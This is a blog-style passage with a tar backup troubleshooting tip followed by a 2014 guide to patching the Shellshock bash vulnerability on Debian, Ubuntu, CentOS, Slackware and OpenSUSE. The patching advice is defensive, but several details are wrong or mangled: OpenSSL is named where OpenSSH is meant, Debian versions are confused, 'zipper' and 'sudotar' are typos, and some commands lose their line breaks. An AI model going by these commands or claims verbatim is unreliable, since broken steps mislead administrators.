its pretty hard to track on exactly which file is the backup producing the Error exit delayed from previous errors, this is especially the case whenever adding to archive directories containing millions of tiny few kilobyte sized files. Many novice on uncautious Linux admins , might simply ignore the warning if they're in a hurry / are having excessive work to be done as there will be .tar.gz backup produced and whenever uncompressed most of the files are there and the backup error would seem not of a big issue.

However as backuping files is vital stuff, especially when moving the files from a server to be decomissioned you have to be extra careful and make the backup properly, e.g. figure out the cause of the error, to do so log the full output of tar operations with tee command, like so:

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites/ /home/sql | tee /tmp/backup_tar_full_output.log

Then you will have to review the file and lookup for errors with less search string – / (slash) – look for "error" and "permission den" keywords and this should point you to what is causing the error. In cases when millions of files are to be archived, the log might grow really big and hard to process, therefore a much quicker way to understand what's happening is to only log and show in shell standard outputlast file error with > (shell redirect):
 

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql > /tmp/backup_failure-cause.log

 

tar: www.ur-website.com-http/2.0.63/conf/tnsnames.ora.20080918: Cannot open: Permission denied
tar: Removing leading `/' from member names

The error indicates clearly the cause of error is lack of Permissions to read the filetnsnames.ora.20080918 so solution is to either grant permissions to non-root user with (chmod / chown) cmds, in my case grant perms to user hipo with which tar is ran, or run again the website backup with superuser, I usually just run with root user to prevent tampering with original permissions, e.g. to solve the error, either:

$ su root
# tar -czvf /tmp/filename_backup_date-of-backup.tar.gz/home/websites /home/sql

Or even better if sudo is installed and user is added to /etc/sudoers file

$ sudotar -czvf /tmp/filename_backup_date-of-backup.tar.gz/home/websites /home/sql


Though permission errors is the most often reason for:

tar: Error exit delayed from previous errors, you should keep in mind that in some cases the error might be caused due to failing RAID membered disk drive or single hdd failure on systems that are not in some RAID array

 

Fixing Shellshock new critical remote bash shell exploitable vulnerability on Debian / Ubuntu / CentOS / RHEL / Fedora / OpenSuSE and Slackware

Friday, October 10th, 2014

Reading Time: 2minutesBash-ShellShock-remote-exploitable-Vulnerability-affecting-Linux-Mac-OSX-and-BSD-fixing-shellshock-bash-vulnerability-debian-redhat-fedora-centos-ubuntu-slackware-and-opensuse
If you still haven’t heard about the ShellShock Bash (Bourne Again) shell remote exploit vulnerability and you admin some Linux server, you will definitely have to read seriously about it. ShellShock Bash Vulnerabily has become public on Sept 24 and is described in details here.

The vulnerability allows remote malicious attacker to execute arbitrary code under certain conditions, by passing strings of code following environment variable assignments. Affected are most of bash versions starting with bash 1.14 to bash 4.3.
Even if you have patched there are some reports, there are other bash shell flaws in the way bash handles shell variables, so probably in the coming month there will be even more patches to follow.

Affected bash flaw OS-es are Linux, Mac OS and BSDs;

• Some DHCP clients

• OpenSSL servers that use ForceCommand capability in (Webserver config)

• Apache Webservers that use CGi Scripts through mod_cgi and mod_cgid as well as cgis written in bash or launching bash subshells

• Network exposed services that use bash somehow

Even though there is patch there are futher reports claiming patch ineffective from both Google developers and RedHat devs, they say there are other flaws in how batch handles variables which lead to same remote code execution.

There are a couple of online testing tools already to test whether your website or certain script from a website is vulnerable to bash remote code executions, one of the few online remote bash vulnerability scanner is here and here. Also a good usable resource to test whether your webserver is vulnerable to ShellShock remote attack is found on ShellShocker.Net.

As there are plenty of non-standard custom written scripts probably online and there is not too much publicity about the problem and most admins are lazy the vulnerability will stay unpatched for a really long time and we’re about to see more and more exploit tools circulating in the script kiddies irc botnets.

Fixing bash Shellcode remote vulnerability on Debian 5.0 Lenny.

Follow the article suggesting how to fix the remote exploitable bash following few steps on older unsupported Debian 4.0 / 3.0 (Potato) etc. – here.

Fixing the bash shellcode vulnerability on Debian 6.0 Squeeze. For those who never heard since April 2014, there is a A Debian LTS (Long Term Support) repository. To fix in Debian 6.0 use the LTS package repository, like described in following article.

If you have issues patching your Debian Wheezy 6.0 Linux bash, it might be because you already have a newer installed version of bash and apt-get is refusing to overwrite it with an older version which is provided by Debian LTS repos. The quickest and surest way to fix it is to do literally the following:


vim /etc/apt/sources.list

Paste inside to use the following LTS repositories:

deb http://http.debian.net/debian/ squeeze main contrib non-free
deb-src http://http.debian.net/debian/ squeeze main contrib non-free
deb http://security.debian.org/ squeeze/updates main contrib non-free
deb-src http://security.debian.org/ squeeze/updates main contrib non-free
deb http://http.debian.net/debian squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian squeeze-lts main contrib non-free

Further on to check the available installable deb package versions with apt-get, issue:



apt-cache showpkg bash
...
...
Provides:
4.1-3+deb6u2 -
4.1-3 -
Reverse Provides:

As you see there are two installable versions of bash one from default Debian 6.0 repos 4.1-3 and the second one 4.1-3+deb6u2, another way to check the possible alternative installable versions when more than one version of a package is available is with:



apt-cache policy bash
...
*** 4.1-3+deb6u2 0
500 http://http.debian.net/debian/ squeeze-lts/main amd64 Packages
100 /var/lib/dpkg/status
4.1-3 0
500 http://http.debian.net/debian/ squeeze/main amd64 Packages

Then to install the LTS bash version on Debian 6.0 run:



apt-get install bash=4.1-3+deb6u2

Patching Ubuntu Linux supported version against shellcode bash vulnerability:
A security notice addressing Bash vulnerability in Ubuntus is in Ubuntu Security Notice (USN) here
USNs are a way Ubuntu discloses packages affected by a security issues, thus Ubuntu users should try to keep frequently an eye on Ubuntu Security Notices

apt-get update
apt-get install bash

Patching Bash Shellcode vulnerability on EOL (End of Life) versions of Ubuntu:

mkdir -p /usr/local/src/dist && cd /usr/local/src/dist
wget http://ftpmirror.gnu.org/bash/bash-4.3.tar.gz.sig
wget http://ftpmirror.gnu.org/bash/bash-4.3.tar.gz
wget http://tiswww.case.edu/php/chet/gpgkey.asc
gpg --import gpgkey.asc
gpg --verify bash-4.3.tar.gz.sig
cd ..
tar xzvf dist/bash-4.3.tar.gz
cd bash-4.3
mkdir patches && cd patches
wget -r --no-parent --accept "bash43-*" -nH -nd
ftp.heanet.ie/mirrors/gnu/bash/bash-4.3-patches/ # Use a local mirror
echo *sig | xargs -n 1 gpg --verify --quiet # see note 2

cd ..
echo patches/bash43-0?? | xargs -n 1 patch -p0 -i # see note 3 below

./configure --prefix=/usr --bindir=/bin
--docdir=/usr/share/doc/bash-4.3
--without-bash-malloc
--with-installed-readline

make
make test && make install

To solve bash vuln in recent Slackware Linux:

slackpkg update
slackpkg upgrade bash

For old Slacks, either download a patched version of bash or download the source for current installed package and apply the respective patch for the shellcode vulnerability.
There is also a GitHub project “ShellShock” Proof of Concept code demonstrating – https://github.com/mubix/shellshocker-pocs
There are also non-confirmed speculations for bash vulnerability bug to impact also:

Speculations:(Non-confirmed possibly vulnerable common server services):

• XMPP(ejabberd)

• Mailman

• MySQL

• NFS

• Bind9

• Procmail

• Exim

• Juniper Google Search

• Cisco Gear

• CUPS

• Postfix

• Qmail

Fixing ShellShock bash vulnerability on supported versions of CentOS, Redhat, Fedora

In supported versions of CentOS where EOL has not reached:

yum –y install bash

In Redhat, Fedoras recent releases to patch:

yum update bash

To upgrade the bash vulnerability in OpenSUSE:

zipper patch –cve=CVE-2014-7187

Shellcode is worser vulnerability than recent SSL severe vulnerability Hearbleed. According to Redhat and other sources this new bash vulnerability is already actively exploited in the wild and probably even worms are crawling the net stealing passwords, data and building IRC botnets for remote control and UDP flooding.